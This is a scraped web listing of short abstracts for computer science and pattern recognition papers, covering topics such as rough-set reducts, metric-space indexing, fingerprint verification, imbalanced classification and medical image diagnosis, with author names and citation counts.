This paper studies the relationship between the two most common definitions of reduct. Although there are other definitions, almost all the literature published in the framework of the Theory of Rough Sets, uses one of the two definitions we study here. However, there is an ambiguity in the use of these definitions and often authors do not previously declare what definition they refer to. Moreover, there are no publications where the relation between these two definitions is widely discussed, just that is what this paper addresses. We enunciate and demonstrate several properties expressing relations between both definitions including some illustrative examples.
more …
By
Tovar, Mireya; Pinto, David; Montes, Azucena; Serna, Gabriel; Vilariño, Darnes
Show all (5)
Post to Citeulike
1 Citations
In this paper we present an approach for the automatic identification of relations in ontologies of restricted domain. We use the evidence found in a corpus associated to the same domain of the ontology for determining the validity of the ontological relations. Our approach employs formal concept analysis, a method used for the analysis of data, but in this case used for relations discovery in a corpus of restricted domain. The approach uses two variants for filling the incidence matrix that this method employs. The formal concepts are used for evaluating the ontological relations of two ontologies. The performance obtained was about 96 for taxonomic relations and 100 % for nontaxonomic relations, in the first ontology. In the second it was about 92 % for taxonomic relations and 98 % for nontaxonomic relations.
more …
By
Figueroa, Karina; Paredes, Rodrigo
Post to Citeulike
1 Citations
The permutation based index has shown to be very effective in medium and high dimensional metric spaces, even in difficult problems such as solving reverse knearest neighbor queries. Nevertheless, currently there is no study about which are the desirable features one can ask to a permutant set, or how to select good permutants. Similar to the case of pivots, our experimental results show that, compared with a randomly chosen set, a good permutant set yields to fast query response or to reduce the amount of space used by the index. In this paper, we start by characterizing permutants and studying their predictive power; then we propose an effective heuristic to select a good set of permutant candidates. We also show empirical evidence that supports our technique.
more …
By
Ita Luna, Guillermo; MarcialRomero, J. Raymundo
Post to Citeulike
1 Citations
We present some results about the parametric complexity of #2SAT and #2UNSAT, which consist on counting the number of models and falsifying assignments, respectively, for two Conjunctive Forms (2CF’s) . Firstly, we show some cases where given a formula F, #2SAT(F) can be bounded above by considering a binary pattern analysis over its set of clauses. Secondly, since #2SAT(F) = 2^{n}#2UNSAT(F) we show that, by considering the constrained graph G_{F} of F, if G_{F} represents an acyclic graph then, #UNSAT(F) can be computed in polynomial time. To the best of our knowledge, this is the first time where #2UNSAT is computed through its constrained graph, since the inclusionexclusion formula has been commonly used for computing #UNSAT(F).
more …
By
Rodríguez, Lisbeth; Li, Xiaoou; MejíaAlvarez, Pedro
Post to Citeulike
2 Citations
Vertical partitioning is a well known technique to improve query response time in relational databases. This consists in dividing a table into a set of fragments of attributes according to the queries run against the table. In dynamic systems the queries tend to change with time, so it is needed a dynamic vertical partitioning technique which adapts the fragments according to the changes in query patterns in order to avoid long query response time. In this paper, we propose an active system for dynamic vertical partitioning of relational databases, called DYVEP (DYnamic VErtical Partitioning). DYVEP uses active rules to vertically fragment and refragment a database without intervention of a database administrator (DBA), maintaining an acceptable query response time even when the query patterns in the database suffer changes. Experiments with the TPCH benchmark demonstrate efficient query response time.
more …
By
Batyrshin, Ildar; Sheremetov, Leonid
Post to Citeulike
3 Citations
The methods of pattern recognition in time series based on moving approximation (MAP) transform and MAP image of patterns are proposed. We discuss main properties of MAP transform, introduce a concept of a MAP image of time series and distance between time series patterns based on this concept which were used for recognition of small patterns in noisy time series. To illustrate the application of this technique to recognition of perception based patterns given by sequence of slopes, an example of recognition of water production patterns in petroleum wells used in expert system for diagnosis of water production problems is considered.
more …
By
OlveraLópez, J. Arturo; MartínezTrinidad, J. Francisco; CarrascoOchoa, J. Ariel
Post to Citeulike
1 Citations
In supervised classification, the object selection or instance selection is an important task, mainly for instancebased classifiers since through this process the time in training and classification stages could be reduced. In this work, we propose a new mixed data object selection method based on clustering and border objects. We carried out an experimental comparison between our method and other object selection methods using some mixed data classifiers.
more …
By
Escalante, Hugo Jair; AcostaMendoza, Niusvel; MoralesReyes, Alicia; GagoAlonso, Andrés
Show all (4)
Post to Citeulike
The ensemble classification paradigm is an effective way to improve the performance and stability of individual predictors. Many ways to build ensembles have been proposed so far, most notably bagging and boosting based techniques. Evolutionary algorithms (EAs) also have been widely used to generate ensembles. In the context of heterogeneous ensembles EAs have been successfully used to adjust weights of base classifiers or to select ensemble members. Usually, a weighted sum is used for combining classifiers outputs in both classical and evolutionary approaches. This study proposes a novel genetic program that learns a fusion function for combining heterogeneousclassifiers outputs. It evolves a population of fusion functions in order to maximize the classification accuracy. Highly nonlinear functions are obtained with the proposed method, subsuming the existing weightedsum formulations. Experimental results show the effectiveness of the proposed approach, which can be used not only with heterogeneous classifiers but also with homogeneousclassifiers and under bagging/boosting based formulations.
more …
By
SánchezAnte, Gildardo
Post to Citeulike
Applications such as programming spotwelding stations require computing paths in highdimensional spaces. Random sampling approaches, such as the Probabilistic Roadmaps (PRM) have shown great potential in solving pathplanning problems in this kinds of environments. In this paper, we review the description of a new probabilistic roadmap planner, called SBL, which stands for Singlequery, Bidirectional and Lazy Collision Checking, and we also add some new results that allow a better comparison of SBL against other similar planners. The combination of features offered by SBL reduces the planning time by large factors, making it possible to handle more difficult planning problems, including multirobot problems in geometrically complex environments. Specifically, we show the results obtained using SBL in environments with as many as 36 degrees of freedom, and environments in which narrow passages are present.
more …
By
GarcíaPerera, L. Paola; MexPerera, Carlos; NolazcoFlores, Juan A.
Post to Citeulike
Abstract
In this research we present a new scheme for the generation of a biometric key based on Automatic Speech Technology and Support Vector Machines. Keys are produced by making a distinction among the voice attributes of the users employing hyperplanes. It is described how the key is conformed and the reliability of the method. We depict an experimental evaluation for different values of the parameters. Among the different kernels for the Support Vector Machine, the RBF obtained the best results.
more …
By
TecuanhuehueVera, P.; CarrascoOchoa, Jesús Ariel; MartínezTrinidad, José Fco.
Post to Citeulike
Multidimensional scaling maps a set of ndimensional objects into a lowerdimension space, usually the Euclidean plane, preserving the distances among objects in the original space. Most algorithms for multidimensional scaling have been designed to work on numerical data, but in soft sciences, it is common that objects are described using quantitative and qualitative attributes, even with some missing values. For this reason, in this paper we propose a genetic algorithm especially designed for multidimensional scaling over mixed and incomplete data. Some experiments using datasets from the UCI repository, and a comparison against a common algorithm for multidimensional scaling, shows the behavior of our proposal.
more …
By
LoyolaGonzález, Octavio; MartínezTrinidad, José Fco.; CarrascoOchoa, Jesús Ariel; GarcíaBorroto, Milton
Show all (4)
Post to Citeulike
Applying resampling methods is an important approach for working with class imbalance problems. The main reason is that many classifiers are sensitive to class distribution, biasing their prediction towards the majority class. Contrast pattern based classifiers are sensitive to imbalanced databases because these classifiers commonly find several patterns of the majority class and only a few patterns (or none) of the minority class. In this paper, we present a correlation study among resampling methods for contrast pattern based classifiers. Our experiments performed over several imbalanced databases show that there is a high correlation among different resampling methods. Correlation results show that there are nine different groups with very high inner correlation and very low outer correlation. We show that most resampling methods allow improving the accuracy of the contrast pattern based classifiers.
more …
By
Antonio Ruz Hernández, José; Suárez Cerda, Dionisio A.; Shelomov, Evgen; Villavicencio Ramírez, Alejandro
Show all (4)
Post to Citeulike
This paper presents an application of artificial intelligence techniques to the improvement of the operation of a thermoelectric unit. The capacity for empirical learning gained from artificial intelligence systems was utilized in the development of the strategy. A neurofuzzy model for the steam generator startup process is obtained from experimental data. Ultimately, the neurofuzzy model is combined with a predictive control algorithm to produce a control strategy for the heating stage of the steam generator. This provides the operators at the fossil power plant with the necessary information to efficiently accomplish the heating process. The information gained from the control strategy is not directly applied to an automatic control scheme; it is presented to the operator who then decides on its application. Therefore, in this way the information is used to develop a strategy that takes into consideration the personal capacity and the working routine of the operator. The simulation tests that were carried out demonstrated the feasibility and the beneficial results that can be obtained from the application of any of the three variants of predictive control proposed in this paper.
more …
By
MoralesHernández, Luis A.; HerreraNavarro, Ana M.; ManriquezGuerrero, Federico; PeregrinaBarreto, Hayde; TerolVillalobos, Iván R.
Show all (5)
Post to Citeulike
1 Citations
Microstructure in graphite nodules plays a fundamental role in mechanical properties in cast iron. Traditional measures used to study spheroid graphite are nodules density, nodularity, volume fraction and mean size. However, sometimes these parameters do not permit a good characterization of the microstructure since they do not allow the discrimination of different regions. In fact, other measures such as size and spatial distributions enable a better understanding of mechanical properties that can be obtained either by altering certain processing variables or through various heat treatments. In the present paper a method to characterize graphite nodules microstructure based on the connectivity generated by dilations is introduced. This approach, which takes into account size and spatial distributions of graphite, permits to relate the microstructure of graphite nodules with the wear behavior.
more …
By
Tovar, Mireya; Pinto, David; Montes, Azucena; Vilariño, Darnes
Show all (4)
Post to Citeulike
Measuring the degree of semantic similarity for word pairs is very challenging task that has been addressed by the computational linguistics community in the recent years. In this paper, we propose a method for evaluating input word pairs in order to measure the degree of semantic similarity. This unsupervised method uses a prototype vector calculated on the basis of word pair representative vectors which are contructed by using snippets automatically gathered from the world wide web.
The obtained results shown that the approach based on prototype vectors outperforms the results reported in the literature for a particular semantic similarity class.
more …
By
Levachkine, Serguei; Velàzquez, Aurelio; Alexandrov, Victor; Kharinov, Mikhail
Show all (4)
Post to Citeulike
11 Citations
Semantic analysis of cartographic images is interpreted as a separate representation of cartographic patterns (alphanumeric, punctual, linear, and area). We present an approach to map interpretation exploring the idea of synthesis of invariant graphic images at low level processing (vectorization and segmentation). This means that we ran “vectorizationrecognition” and “segmentationinterpretation” systems simultaneously. Although these systems can generate some errors in interpretation, they are much more useful for the following understanding algorithms because its output is nearly recognized objects of interest.
more …
By
Esquivel, Susana C.; Coello, Carlos A. Coello
Post to Citeulike
7 Citations
In this paper, we study the use of particle swarm optimization (PSO) for a class of nonstationary environments. The dynamic problems studied in this work are restricted to one of the possible types of changes that can be produced over the fitness landscape. We propose a hybrid PSO approach (called HPSO_dyn), which uses a dynamic macromutation operator whose aim is to maintain diversity. In order to validate our proposed approach, we adopted the test case generator proposed by Morrison & De Jong [1], which allows the creation of different types of dynamic environments with a varying degree of complexity. The main goal of this research was to determine the advantages and disadvantages of using PSO in nonstationary environments. As part of our study, we were interested in analyzing the ability of PSO for tracking an optimum that changes its location over time, as well as the behavior of the algorithm in the presence of high dimensionality and multimodality.
more …
By
EscobarAcevedo, Adelina; MontesyGómez, Manuel; VillaseñorPineda, Luis
Post to Citeulike
Crosslanguage text classification (CLTC) aims to take advantage of existing training data from one language to construct a classifier for another language. In addition to the expected translation issues, CLTC is also complicated by the cultural distance between both languages, which causes that documents belonging to the same category concern very different topics. This paper proposes a reclassification method which purpose is to reduce the errors caused by this phenomenon by considering information from the own target language documents. Experimental results in a news corpus considering three pairs of languages and four categories demonstrated the appropriateness of the proposed method, which could improve the initial classification accuracy by up to 11%.
more …
By
RiveraRovelo, Jorge; Herold, Silena; BayroCorrochano, Eduardo
Post to Citeulike
2 Citations
In this paper we present a method based on selforganizing neural networks to extract the shape of a 2D or 3D object using a set of transformations expressed as versors in the conformal geometric algebra framework. Such transformations, when applied to any geometric entity of this geometric algebra, define the shape of the object. This approach was tested with several images, but here we show its utility first using a 2D magnetic resonance image to segment the ventricle. Then we present some examples of an application for the case of 3D objects.
more …
By
BayroCorrochano, Eduardo
Post to Citeulike
In this paper the authors use the framework of geometric algebra for applications in computer vision, robotics and learning . This mathematical system keeps our intuitions and insight of the geometry of the problem at hand and it helps us to reduce considerably the computational burden of the problems. The authors show that framework of geometric algebra can be in general of great advantage for applications using stereo vision, range data, laser, omnidirectional and odometry based systems. For learning the paper presents the Clifford Support Vector Machines as a generalization of the real and complexvalued Support Vector Machines.
more …
By
MedinaPérez, Miguel Angel; GarcíaBorroto, Milton; GutierrezRodríguez, Andres Eduardo; AltamiranoRobles, Leopoldo
Show all (4)
Post to Citeulike
1 Citations
Developing accurate fingerprint verification algorithms is an active research area. A large amount of fingerprint verification algorithms are based on minutiae descriptors. An important component of these algorithms is the alignment strategy. The single alignment strategy, with O(n^{2}) time complexity, uses the local matching minutiae pair that maximizes the similarity value to align the minutiae. Nevertheless, even if the selected minutiae pair is a true matching pair, it is not necessarily the best pair to carry out fingerprint alignment. The multiple alignments strategy alleviates these limitations by performing multiple minutiae alignments, increasing the time complexity to O(n^{4}). In this paper, we improve the multiple alignment strategy, reducing its complexity while still achieving a high accuracy. The new strategy is based on the rationale that most minutiae descriptors from one fingerprint correspond with their most similar descriptors from the other fingerprint. To test the new strategy behavior, we adapt three well known algorithms to a traditional multiple alignment strategy and to our strategy. Several experiments in the FVC2004 database show that our strategy outperforms both the single and the multiple alignments strategies.
more …
By
Arriaga, Jonathan; ValenzuelaRendón, Manuel
Post to Citeulike
1 Citations
The construction of a portfolio in the financial field is a problem faced by individuals and institutions worldwide. In this paper we present an approach to solve the portfolio selection problem with the Steepest Ascent Hill Climbing algorithm. There are many works reported in the literature that attempt to solve this problem using evolutionary methods. We analyze the quality of the solutions found by a simpler algorithm and show that its performance is similar to a Genetic Algorithm, a more complex method. Real world restrictions such as portfolio value and rounded lots are considered to give a realistic approach to the problem.
more …
By
LemuzLópez, Rafael; AriasEstrada, Miguel
Post to Citeulike
1 Citations
In this paper we address the problem of recovering the threedimensional shape of an object and the motion of the camera based on multiple feature correspondences from an image sequence. We present a new incremental projective factorization algorithm using a perspective camera model. The original projective factorization method produces robust results. However, the method can not be applied to realtime applications since it is based on a batch processing pipeline and the size of the data matrix grows with each additional frame. The proposed algorithm obtains an estimate of shape and motion for each additional frame adding a dimension reduction step. A subset of frames is selected analyzing the contribution of frames to the reconstruction quality. The main advantage of the novel algorithm is the reduction of the computational cost while keeping the robustness of the original method. Experiments with synthetic and real images illustrate the accuracy and performance of the new algorithm.
more …
By
SánchezParra, Marino; ViteHernández, René
Post to Citeulike
A rulebased, digital, closedloop controller that incorporates “fuzzy” logic has been designed and implemented for the control of flow instabilities in axial compressors used with gas turbines for power generation. Having designed several controllers for similar purposes [1], a comparison was made among the rulebased and analytic approaches. Differences in the division of labor between plant engineers and control specialists, the type of knowledge required and its acquisition, the use of performance criteria, and controllers testing are discussed. The design, implementation and calibration of rulebased controllers are reviewed, with specific examples taken from the completed work on the generic dynamic mathematical model (GDMM) of flow instabilities in axial compressors developed in the IIE Department of Control and Instrumentation [2].
more …
By
Domínguez, A. Rojas; LaraAlvarez, Carlos; Bayro, Eduardo
Post to Citeulike
2 Citations
A novel method for automated identification of banknotes’ denominations based on image processing is presented. The method is part of a wearable aiding system for the visually impaired, and it uses a standard video camera as the image collecting device. The method first extracts points of interest from the denomination region of a banknote and then performs an analysis of the geometrical patterns so defined, which allows the identification of the banknote denomination. Experiments were performed with a testsubject in order to simulate realworld operating conditions. A high average identification rate was achieved.
more …
By
Rodríguez, LuisFelipe; Ramos, Félix
Post to Citeulike
Cognitive architectures allow the emergence of behaviors in autonomous agents. Their design is commonly based on multidisciplinary theories and models that explain the mechanisms underlying human behaviors, as well as on standards and principles used in the development of software systems. The formal and rigorous description of such architectures, however, is a software engineering practice that has been barely implemented. In this paper, we present the formal specification of a neuroscienceinspired cognitive architecture. Which ensures its proper development and subsequent operation, as well as the communication of its operational and architectural assumptions unambiguously. Particularly, we use the RealTime Process Algebra to formally describe its architectural components and emerging behaviors.
more …
By
Montero, José Antonio; Sucar, L. Enrique
Post to Citeulike
1 Citations
Most gesture recognition systems are based only on hand motion information, and are designed mainly for communicative gestures. However, many activities of everyday life involve interaction with surrounding objects. We propose a new approach for the recognition of manipulative gestures that interact with objects in the environment. The method uses nonintrusive visionbased techniques. The hands of a person are detected and tracked using an adaptive skin color segmentation process, so the system can operate in a wide range of lighting conditions. Gesture recognition is based on hidden Markov models, combining motion and contextual information, where the context refers to the relation of the position of the hand with other objects. The approach was implemented and evaluated on two different domains: video conference and assistance, obtaining gesture recognition rates from 94 % to 99.47 %. The system is very efficient so it is adequate for use in realtime applications.
more …
By
Lara–Alvarez, Carlos; Rojas, Alfonso; Bayro–Corrochano, Eduardo
Post to Citeulike
The Place Recognition (PR) problem is fundamental for real time applications such as mobile robots (e.g. to detect loop closures) and guidance systems for the visually impaired. The Bag of Words (BoW) is a conventional approach that calculates a histogram of frequencies. One of the disadvantages of the BoW representation is that it loses information about the spatial location of features in the image. In this paper we study an approximate index based on the classic q–gram paradigm to recover images. Similar to the BoW, our approach detects interest points and assigns labels. Each image is represented by a set of q–grams obtained from triangles of a Delaunay decomposition. This representation allows us to create an index and to recover images efficiently. The proposed approach is path independent and was tested with a publicly available dataset showing a high recall rate and reduced time complexity.
more …
By
SilvánCárdenas, José Luis; Wang, Le
Post to Citeulike
Building footprint geometry is a basic layer of information required by government institutions for a number of land management operations and research. LiDAR (light detection and ranging) is a laserbased altimetry measurement instrument that is flown over relatively wide land areas in order to produce digital surface models. Although high spatial resolution LiDAR measurements (of around 1 m horizontally) are suitable to detect aboveground features through elevation discrimination, the automatic extraction of buildings in many cases, such as in residential areas with complex terrain forms, has proved a difficult task. In this study, we developed a method for detecting building footprint from LiDAR altimetry data and tested its performance over four sites located in Austin, TX. Compared to another standard method, the proposed method had comparable accuracy and better efficiency.
more …
By
GarciaCeja, Enrique; Brena, Ramon; GalvánTejada, Carlos E.
Post to Citeulike
1 Citations
Most of the previous works in hand gesture recognition focus in increasing the accuracy and robustness of the systems, however little has been done to understand the context in which the gestures are performed, i.e, the same gesture could mean different things depending on the context and situation. Understanding the context may help to build more userfriendly and interactive systems. In this work, we used location information in order to contextualize the gestures. The system constantly identifies the location of the user so when he/she performs a gesture the system can perform an action based on this information.
more …
By
Osorio, Mauricio; Navarro, Juan Antonio
Post to Citeulike
We develop some ideas in order to obtain a nonmonotonic reasoning system based on the modal logic S4. As a consequence we show how to express the well known answer set semantics using a restricted fragment of modal formulas. Moreover, by considering the full set of modal formulas, we obtain an interesting generalization of answer sets for logic programs with modal connectives. We also depict, by the use of examples, possible applications of this inference system.
It is also possible to replace the modal logic S4 with any other modal logic to obtain similar nonmonotonic systems. We even consider the use of multimodal logics in order to model the knowledge and beliefs of agents in a scenario where their ability to reason about each other’s knowledge is relevant. Our results clearly state interesting links between answer sets, modal logics and multiagent systems.
more …
By
Alejo, R.; Sotoca, J. M.; Valdovinos, R. M.; Toribio, P.
Show all (4)
Post to Citeulike
1 Citations
The quality and size of the training data sets is a critical stage on the ability of the artificial neural networks to generalize the characteristics of the training examples. Several approaches are focused to form training data sets by identification of border examples or core examples with the aim to improve the accuracy of network classification and generalization. However, a refinement of data sets by the elimination of outliers examples may increase the accuracy too. In this paper, we analyze the use of different editing schemes based on nearest neighbor rule on the most popular neural networks architectures.
more …
By
Figueroa, Karina; Paredes, Rodrigo; CamarenaIbarrola, J. Antonio; Reyes, Nora
Show all (4)
Post to Citeulike
1 Citations
Similarity searching consists in retrieving from a database the objects, also known as nearest neighbors, that are most similar to a given query, it is a crucial task to several applications of the pattern recognition problem. In this paper we propose a new technique to reduce the number of comparisons needed to locate the nearest neighbors of a query. This new index takes advantage of two known algorithms: FHQT (Fixed Height Queries Tree) and PBA (PermutationBased Algorithm), one for low dimension and the second for high dimension. Our results show that this combination brings out the best of both algorithms, this winner combination of FHQT and PBA locates nearest neighbors up to four times faster in high dimensions leaving the known well performance of FHQT in low dimensions unaffected.
more …
By
Pinto, David; Vilariño, Darnes; Balderas, Carlos; Tovar, Mireya; Beltrán, Beatriz
Show all (5)
Post to Citeulike
1 Citations
Word Sense Disambiguation (WSD) is considered one of the most important problems in Natural Language Processing [1]. It is claimed that WSD is essential for those applications that require of language comprehension modules such as search engines, machine translation systems, automatic answer machines, second life agents, etc. Moreover, with the huge amounts of information in Internet and the fact that this information is continuosly growing in different languages, we are encourage to deal with crosslingual scenarios where WSD systems are also needed. On the other hand, Lexical Substitution (LS) refers to the process of finding a substitute word for a source word in a given sentence. The LS task needs to be approached by firstly disambiguating the source word, therefore, these two tasks (WSD and LS) are somehow related. In this paper, we present a naïve approach to tackle the problem of crosslingual WSD and crosslingual lexical substitution. We use a bilingual statistical dictionary, which is calculated with Giza++ by using the EUROPARL parallel corpus, in order to calculate the probability of a source word to be translated to a target word (which is assumed to be the correct sense of the source word but in a different language). Two versions of the probabilistic model are tested: unweighted and weighted. The results were compared with those of an international competition, obtaining a good performance.
more …
By
SalgadoGarza, Luis R.; NolazcoFlores, Juan A.
Post to Citeulike
Abstract
This document describes the realization of a spoken information retrieval system and its application to words search in an indexed video database. The system uses an automatic speech recognition (ASR) software to convert the audio signal of a video file into a transcript file and then a document indexing tool to index this transcripted file. Then, a spoken query, uttered by any user, is presented to the ASR to decode the audio signal and propose a hypothesis that is later used to formulate a query to the indexed database. The final outcome of the system is a list of video frame tags containing the audio correspondent to the spoken query. The speech recognition system achieved less than 15% Word Error Rate (WER) and its combined operation with the document indexing system showed outstanding performance with spoken queries.
more …
By
RosalesPérez, Alejandro; Gonzalez, Jesus A.; CoelloCoello, Carlos A.; ReyesGarcia, Carlos A.; Escalante, Hugo Jair
Show all (5)
Post to Citeulike
1 Citations
This paper introduces EMOPG+FS, a novel approach to prototype generation and feature selection that explicitly minimizes the classification error rate, the number of prototypes, and the number of features. Under EMOPG+FS, prototypes are initialized from a subset of training instances, whose positions are adjusted through a multiobjective evolutionary algorithm. The optimization process aims to find a set of suitable solutions that represent the best possible tradeoffs among the considered criteria. Besides this, we also propose a strategy for selecting a single solution from the several that are generated during the multiobjective optimization process.We assess the performance of our proposed EMOPG+FS using a suite of benchmark data sets and we compare its results with respect to those obtained by other evolutionary and nonevolutionary techniques. Our experimental results indicate that our proposed approach is able to achieve highly competitive results.
more …
By
HernándezRodríguez, Selene; MartínezTrinidad, J. Francisco; CarrascoOchoa, J. Ariel
Post to Citeulike
1 Citations
In this work, a fast k most similar neighbor (kMSN) classifier for mixed data is presented. The k nearest neighbor (kNN) classifier has been a widely used nonparametric technique in Pattern Recognition. Many fast kNN classifiers have been developed to be applied on numerical object descriptions, most of them based on metric properties to avoid object comparisons. However, in some sciences as Medicine, Geology, Sociology, etc., objects are usually described by numerical and non numerical features (mixed data). In this case, we can not assume the comparison function satisfies metric properties. Therefore, our classifier is based on search algorithms suitable for mixed data and nonmetric comparison functions. Some experiments and a comparison against other two fast kNN methods, using standard databases, are presented.
more …
By
GaliciaHaro, Sofía N.
Post to Citeulike
1 Citations
We consider temporal expressions formed by a noun of time reinforced by an adverb of time, in order to extend the range of annotation of temporal expressions. Fro this, we analyze some groups to build finite state automata to automatically determine such type of expressions. To determine the extent of annotation, we present a method for obtaining the most preferable variants from Internet. We analyze some groups to capture their meaning.
more …
By
Quintero, Rolando; Levachkine, Serguei; Torres, Miguel; Moreno, Marco
Show all (4)
Post to Citeulike
1 Citations
In this work, we present an algorithm for increasing spectral resolution in DEM. The algorithm is based on the 8connected skeleton of polygons formed by the contour lines and to prune this skeleton by translating it into a graph. This is an alternative to the processes of vector interpolation. With this approach, it is possible to find new elevation data from the information contained in DEM and generate new data with the same spatial resolution.
more …
By
Barandela, Ricardo; Valdovinos, Rosa M.; Sánchez, J. Salvador; Ferri, Francesc J.
Show all (4)
Post to Citeulike
35 Citations
The problem of imbalanced training sets in supervised pattern recognition methods is receiving growing attention. Imbalanced training sample means that one class is represented by a large number of examples while the other is represented by only a few. It has been observed that this situation, which arises in several practical domains, may produce an important deterioration of the classification accuracy, in particular with patterns belonging to the less represented classes. In this paper we present a study concerning the relative merits of several resizing techniques for handling the imbalance issue. We assess also the convenience of combining some of these techniques.
more …
By
Escarcega, David; Ramos, Fernando; Espinosa, Ana; Berumen, Jaime
Show all (4)
Post to Citeulike
Cervical Cancer (CC) is the result of the infection of high risk Human Papilloma Viruses. mRNA microarray expression data provides biologists with evidences of cellular compensatory gene expression mechanisms in the CC progression. Pattern recognition of signalling pathways through expression data can reveal interesting insights for the understanding of CC. Consequently, gene expression data should be submitted to different preprocessing tasks. In this paper we propose a methodology based on the integration of expression data and signalling pathways as a needed phase for the pattern recognition within signaling CC pathways. Our results provide a topdown interpretation approach where biologists interact with the recognized patterns inside signalling pathways.
more …
By
RodríguezLópez, Verónica; CruzBarbosa, Raúl
Post to Citeulike
2 Citations
Nowadays, breast cancer is considered a significant health problem in Mexico. Mammogram is an effective study for early detecting signs of this disease. One of the most important findings in this study is a mass, which is the main indicator of malignancy. However, mass detection and diagnosis are difficult. In this study, the impact of the inclusion of seven clinical features on the performance of Bayesian Networks models for mass diagnosis is presented. Here, Naïve Bayes, Tree Augmented Naïve Bayes, Kdependence Bayesian classifier, and Forest Augmented Naïve Bayes models with eight image features nodes were augmented with several clinical features subsets. These models were trained with a data set extracted from the public BCDRF01 database. The experimental results have shown that the Bayesian networks models augmented with a subset of three clinical features have improved their performance up to 0.82 in accuracy, 0.80 in sensitivity, and 0.83 in specificity. Therefore, these augmented models are considered as suitable and promising methods for mass classification.
more …
